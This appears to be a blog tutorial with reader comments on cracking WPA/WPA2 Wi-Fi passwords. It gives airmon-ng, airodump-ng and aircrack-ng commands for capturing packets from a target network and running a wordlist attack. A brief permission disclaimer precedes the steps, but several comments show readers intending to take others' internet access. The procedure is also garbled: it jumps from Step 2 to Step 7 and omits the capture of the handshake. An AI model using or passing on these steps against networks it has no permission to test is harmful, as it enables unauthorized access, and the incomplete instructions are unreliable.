“Hacking Wifi” sounds really cool and interesting. But actually hacking wifi practically is much easier with a good wordlist. But this world list is of no use until we don’t have any idea of how to actually use that word list in order to crack a hash. And before cracking the hash we actually need to generate it.
First of all, we need some prerequisites
1. A Laptop and if you have a computer we need a wifi adopter which are support monitor mode.
2. Kali Linux os installed in your main laptop/computer and if you use virtual software so we need wifi adopter. (If you don't know how to install Kali Linux os in your system please check out this link - Kali linux os Installation)
So, below are those steps along with some good wordlists to crack a WPA/WPA2 wifi. Note: Use the below methods only for educational/testing purposes on your own wifi or with the permission of the owner. Don’t use this for malicious purposes. So, boot up Kali Linux. Open the window's terminal. And perform the following steps.
Step 1: ifconfig (interface configuration): To view or change the configuration of the network interfaces on your system.
#ifconfig
Here,
- eth0: First Ethernet interface
- lo: Loopback interface
- wlan0 : First wireless network interface on the system. (This is what we need.)
Step2: Stop the current processes which are using the WiFi interface.
# airmon-ng check kill
- To start the wlan0 in monitor mode.airmon-ng start wlan0
- To view all the Wifi networks around you.
# airodump-ng wlan0mon
Press Ctrl+C to stop the process when you have found thetarget network.
- To view the clients connected to the target network.
# airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon
Now, we are done with capturing the packets. So, now you can close the terminal window.
Step 7. To decrypt the password. Open the Files application.
Here,
hacking-01.cap is the file you need.
# aircrack-ng -w /root/passwords.txt /root/hacking-01.cap
- aircrack-ng : 802.11 WEP and WPA-PSK keys cracking program
- -w : Location of the wordlist file
- /root/hacking-01.cap : Location of the cap file
Finally we got a Wifi password it's very simple and Anybody can do this . If you have any query you can comment and follow us for more interesting articles.
Ab hum free internet use krte h, Thanks sir
ReplyDeleteMost welcome
DeleteSuper ❤️
DeleteVery easy steps
ReplyDeleteGood
ReplyDeleteWork
Welldone
ReplyDeleteSir password file kha se download kre
ReplyDeleteSir, I want to learn how to hack ?
ReplyDeleteO_O_O_O Good
ReplyDeleteThanks
ReplyDeleteEveryone can hack wifi password . You are good writer.
ReplyDeleteGood info sir
ReplyDeletegood
ReplyDeleteOsm trick
ReplyDeleteGood job
ReplyDeleteHelp me🧑💻🧑💻🧑💻
ReplyDelete🤩🤩🤩🤩🤩
ReplyDelete⭐⭐⭐⭐⭐
ReplyDeleteThe osm thing is anybody can do that
ReplyDelete